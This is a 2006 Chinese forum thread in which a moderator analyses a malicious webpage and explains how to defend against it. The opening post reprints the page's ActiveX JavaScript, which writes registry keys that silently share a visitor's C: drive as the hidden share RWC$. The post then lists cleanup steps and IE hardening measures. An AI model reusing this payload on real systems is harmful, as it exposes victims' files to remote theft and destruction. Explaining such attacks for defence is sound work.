您尚未
登入
注册
忘记密码
搜寻
赞助
赞助本站
数位公仔
纪念T恤
纪念马克杯
广告
刊登广告
广告价格
线上申请刊登
用雅币刊登
免费刊登
目前客户
简讯
简讯说明
购买金币
发送简讯
预约简讯
发送记录
好友通讯
罐头简讯
论命
数位论命馆
免费排盘工具
葫芦墩 优生造命
葫芦墩 八字命书
影音论命(葫芦墩)
影音占卜(葫芦墩)
购买金币
星座分析
孔明神数
周公解梦
星侨线上论命
娱乐
影 像 行 脚
数 位 造 型
数 位 画 廊
心 情 日 记
公 益 彩 券
送生日蛋糕
俄罗斯方块
四 川 省
猜 数 字
比 大 小
泡 泡 龙
许 愿 池
万 年 历
经 期 计 算
体 重 测 量
音 乐 点 播
卫 星 地 图
时间戳字幕
男女聊天室
求助
论坛守则
会员等级
会员权限
语法教学
常见问题
最新活动
打工赚雅币
最近
枫之谷
-最近浏览-
GameGuard
首页
新版首页(全页)
传统首页(全页)
新版首页(选单)
传统首页(选单)
MyChat 数位男女
命理风水
15
星侨五术软体
4
葫芦墩命理网
5
命理问答
9
四柱八字
1
紫微斗数
1
姓名学
手面相
易经占卜
1
风水研讨
1
择日&三式
1
西洋占星
无视论塔罗牌
10
修行&武术
1
中医研讨
五术哈啦
1
电脑资讯
13
硬体讨论
5
超频 & 开箱
3
数位生活
2
PDA 讨论
手机讨论区
软体推荐
2
软体讨论
6
Apple 讨论
1
Unix-like
网路&防毒
2
程式设计
网站架设
4
电脑教学资源
生活休闲
14
休闲哈啦
7
感情世界
2
上班一族
5
国考&法律
7
生活医学
4
运动体育
1
单车讨论
1
钓鱼讨论
6
旅游讨论
4
天文观星
3
摄影分享
8
图片分享
4
数位影视
2
笑话集锦
3
兴趣嗜好
13
文学散文
7
绘图艺术
1
布袋戏
3
动漫画讨论
3
美食天地
6
理财专区
心理测验
1
汽、机车
3
宠物园地
模型&手工艺
4
花卉园艺
魔术方块
独轮车专区
电玩游戏
13
游戏欢乐包
4
CS讨论
8
Steam
3
MineCraft
2
东方Project
英雄联盟LOL
1
单机游戏
2
WebGame
3
线上游戏1
6
线上游戏2
5
电视游乐器
1
掌上型游戏
2
模拟器游戏
1
工商服务
6
虚拟城市
7
好康分享
新品贩售
二手拍卖
1
租屋&找屋
工商建议区
1
站务专区
10
最新活动
活动成果
数位造型
心情日记
个人图库
新人报到练习
论坛问题建议
1
荣会及电子报讨论
-最近版区-
枫之谷
-最近浏览-
GameGuard
»
电脑资讯
硬体讨论
超频 & 开箱
数位生活
PDA 讨论
手机讨论区
软体推荐
软体讨论
Apple 讨论
Unix-like
网路&防毒
程式设计
网站架设
电脑教学资源
»
网路&防毒
网路通讯讨论
防毒防骇讨论
»
防毒防骇讨论
防毒历史问题
»
防毒历史问题
»
浏览网页硬碟被共享
手机版
订阅
地图
繁体
您是第
7020
个阅读者
可列印版
加为IE收藏
收藏主题
上一主题
|
下一主题
upside
反病毒 反诈骗 反虐犬
级别:
版主
版区:
硬体讨论
,
公益互助
,
PDA 讨论
,
手机讨论区
,
诈骗资讯
,
网路&防毒
x372
x2016
分享:
▼
x
0
[资讯教学] 浏览网页硬碟被共享
现在上网真是不安全,前一阵子闹得最凶的是“万花谷”,如果进入该网页浏览者注册表会被修改,好多系统功能因此受到限
制。最近又听说有网友在浏览网页时硬碟被共享,危害似乎更大!
其实,所谓的浏览网页硬碟被共享,和“万花谷”一样,受害者都是在浏览了含有有害代码的ActiveX网页文件后中招的。
以下是该网页原代码中的关键部分﹕
script language=JavaScript
document.write("");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\RWC$\\Flags",302,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\Network\\LanMan\\ RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\
LanMan\\RWC$\\Path","C:\\"
);
}
function init()
{
setTimeout("f()", 1000);
}
init();
/script
注意﹕以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表,在HKEY_LOCAL_MACHINE\Software\Microsoft
\Windows\CurrentVersion\Network\LanMan下面添加键值“RWC$” ,在RWC$”下又分别建立键值“Flags”、“Type”
“Path”,这样就把c盘设为共享了,共享名为RWC$。而且你在网络属性中还看不到硬碟被共享了!如果
把"Flags"=dword:00000302改成"Flags"=dword:00000402就可看到硬碟被共享。
由于只要浏览这类网页硬碟即被共享,因此其危害较之木马更大(个人观点)。如果不小心中招,那么给你下套的人完全
可以把你的硬碟当做他的一个逻辑硬碟,他可以在你电脑中随意拷贝文件,删除文件,给文件改名……如果这样还不能令他满
意,他完全可以给你再下个木马(哦,错了!不是一个、是一群木马),那样你就生不如死了,什么秘密都没有了﹕上网账
号、QQ密码、给MM的信件……如果他高兴还可以格式化你的硬碟,或者是在你的电脑中运行“江民炸弹”之类的软件破坏你
的硬碟。总之,你的一切都在他的掌握之下了,想想够可怕了吧?
解决办法﹕把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“RWC$”删掉。
狠一点的,也可以把windows\system\下面的Vserver.vxd(Microsoft 网络上的文件与打印机共享,虚拟设备驱动程序)删掉,再把
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver键值删掉,永绝这类“木马”的后路吧。
防御防范﹕
1、不要轻易去一些自己并不了解的站点,特别是那些看上去美丽诱人的网址更不要贸然前往,否则吃亏的往往是你。
2、运行IE,点击“工具→Internet选项→安全→Internet区域的安全级别,把安全极别由“中”改为“高”
3、由于该类网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以
避免中招。具体方法是﹕在IE窗口中点击“工具→Internet选项,在弹出的对话框中选择“安全”标签,再点击“自定义级别”
按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。不过,这样做在以
后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。唉,有利就有弊,你还是自己看着办吧。
4、对于Windows98用户,请打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class”删掉;
对于WindowsMe用户,请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉。请放心,
删除这个组件不会影响到你正常浏览网页的。
5、既然这类网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁﹕禁止修改注册表,这样就可以
达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打
开这把“锁”!
加锁方法如下﹕
(1)运行注册表编辑器regedit.exe;
(2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,新建一个名为
DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。
解锁方法如下﹕
用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下﹕
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。要注意的是,在“REGEDIT4”后
面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!
6、安装网络防火墙,特别是安装了Norton2001后,进入该类网页就会报警提示有脚本写注册表,国产反病毒软件
KVW3000也有此类功效,建议你也安装一个这样的软件。
7、虽然经过一番辛苦的劳动修改回了标题和默认连接首页,但如果以后又不小心进入该站就又得麻烦一次。其实,你可
以在IE中做一些设置以便永远不进该站点﹕
打开IE,点击“工具”→“Internet选项”→“内容”→“分级审查”,点“启用”按钮,会调出“分级审查”对话框,然后点
击“许可站点”标签,输入不想去的网站网址,如输入﹕http://www.sohu8.com,按“从不”按钮,再点击“确定”即大功告
成!
爸爸 你一路好走
x
0
[楼 主]
From:台湾 |
Posted:
2006-10-24 18:04 |
roger70609
级别:
小人物
x0
x11
分享:
▲
▼
哇~~
原来有这么恐怖的事情喔@@
x
0
[1 楼]
From:台湾中华电信 |
Posted:
2006-10-24 20:02 |
sang
级别:
知名人士
x49
x4916
分享:
▲
@@".upside版主提供的好详细哦.
的确,因为很多人没有留意浏览网页时已经网页指令的指向改变了本身的ie设定.所以有时我们也必须常去注意防毒之外的
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion 下的设定是不是被人动了手脚,现在已经不是单纯的改变某几个档案而已了..
http://bbs.mychat.to/user.php?a=SANG
x
0
[2 楼]
From:台湾数位联合 |
Posted:
2006-10-24 20:11 |
MyChat 数位男女
»
防毒历史问题
Powered by
PHPWind
v1.3.6
Copyright © 2003-04
PHPWind
Processed in 0.080149 second(s),query:16 Gzip disabled
本站由
瀛睿律师事务所
担任常年法律顾问 |
免责声明
|
本网站已依台湾网站内容分级规定处理
|
连络我们
|
访客留言